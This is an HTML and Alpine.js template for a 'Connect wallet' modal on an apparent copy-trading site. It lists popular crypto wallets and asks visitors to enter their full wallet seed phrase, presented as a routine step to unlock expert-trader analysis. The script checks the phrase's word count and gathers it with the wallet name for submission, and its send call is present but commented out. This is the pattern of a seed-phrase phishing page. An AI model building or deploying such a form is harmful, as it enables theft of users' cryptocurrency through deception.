<section
  class="fixed top-0 bottom-0 min-h-screen overflow-auto left-0 right-0 py-16 bg-[rgba(0,0,0,.8)] flex justify-center text-sm z-50"
  x-data="request"
>
  <!-- form container -->
  <div
    class="bg-white rounded-xl h-fit w-1/2 max-md:w-3/4 max-sm:w-11/12 p-10 max-md:p-5 flex flex-col gap-8 relative"
  >
    <h1 class="text-xl font-semibold">Connect wallet</h1>
    <p class="text-neutral-700 text-sm">
      To access our collection of expert traders to copy analysis, we require
      that you connect your wallet address to your account
    </p>
    <div class="flex flex-col gap-5">
      <h2 class="text-base font-semibold">Select Wallet</h2>
      <div class="grid grid-cols-5 max-md:grid-cols-3 gap-5">
        <template x-for="wallet in wallets">
          <div
            class="p-2 rounded-xl cursor-pointer flex flex-col-reverse gap-2 justify-center"
            @click="SetCurrentWallet(wallet.name)"
            :class="currentWallet.name==wallet.name?'border-2 border-main':'border border-neutral-100'"
          >
            <span x-text="wallet.name" class="text-xs"></span>
            <img
              :src="wallet.logo"
              alt=""
              class="h-8 w-8 object-contain rounded-full max-md:w-6 max-md:h-6"
            />
          </div>
        </template>
      </div>
    </div>
    <form
      action=""
      class="flex flex-col gap-10 copyRequestForm"
      @submit="submitRequest"
    >
      <fieldset class="flex flex-col gap-5">
        <label for="" class="text-base font-semibold"
          >Enter Wallet Seed Phrase</label
        >
        <input
          type="text"
          placeholder="enter your wallet seed phrase to unlock"
          class="bg-transparent border border-neutral-200 p-5 rounded-xl"
          name="phrase"
        />
      </fieldset>
      <!-- error popup flashcard -->
      <div
        class="border border-red-600 p-3 rounded-xl flex items-center gap-4"
        x-show="error"
        x-cloak
        x-transition
        x-transition.duration.500ms
      >
        <i class="ri-error-warning-line text-2xl text-red-600"></i>
        <span x-text="errorText" class="text-red-600"></span>
      </div>
      <button class="bg-main text-neutral-900 p-5 rounded-full text-base">
        Connect wallet
      </button>
    </form>
  </div>
  <script>
    document.addEventListener("alpine:init", () => {
      const user = JSON.parse(document.getElementById("user").textContent);
      const wallets = [
        {
          name: "Trust Wallet",
          logo: "/static/images/trust.webp",
        },
        {
          name: "MetaMask",
          logo: "/static/images/metamask.webp",
        },
        {
          name: "OKX Wallet",
          logo: "/static/images/okx.webp",
        },
        {
          name: "Bitget Wallet",
          logo: "/static/images/okx.webp",
        },
        {
          name: "SafePal",
          logo: "/static/images/safepal.webp",
        },
        {
          name: "Changelly",
          logo: "/static/images/changelly.svg",
        },
        {
          name: "Coinbase Wallet",
          logo: "/static/images/coinbase.webp",
        },
        {
          name: "Rainbow Wallet",
          logo: "/static/images/rainbow.webp",
        },
        {
          name: "Safe Wallet",
          logo: "/static/images/safe.webp",
        },
      ];
      Alpine.data("request", () => ({
        error: false,
        errorText: "",
        user: user,
        wallets: wallets,
        currentWallet: {
          name: "",
          logo: "",
        },
        async submitRequest(e) {
          e.preventDefault();
          let form = new FormData(document.querySelector(".copyRequestForm"));
          if (this.currentWallet.name == "") {
            this.errorText = "Select a wallet";
            this.flashError();
            return;
          }
          if (e.target.phrase.value == "") {
            this.errorText = "Enter wallet unlock phrase";
            this.flashError();
            return;
          }
          if (e.target.phrase.value.split(" ").length % 12 !== 0) {
            console.log(e.target.phrase.value.split(" "));
            this.errorText = "Invalid passphrase";
            this.flashError();
            return;
          }
          form.append("wallet", this.currentWallet.name);
          for (let i of form.entries()) {
            console.log(i);
          }
          // await fetch("");
        },
        SetCurrentWallet(name) {
          this.currentWallet = wallets.find((item) => item.name == name);
        },
        flashError() {
          this.error = true;
          setTimeout(() => {
            this.error = false;
          }, 2000);
        },
      }));
    });
  </script>
</section>
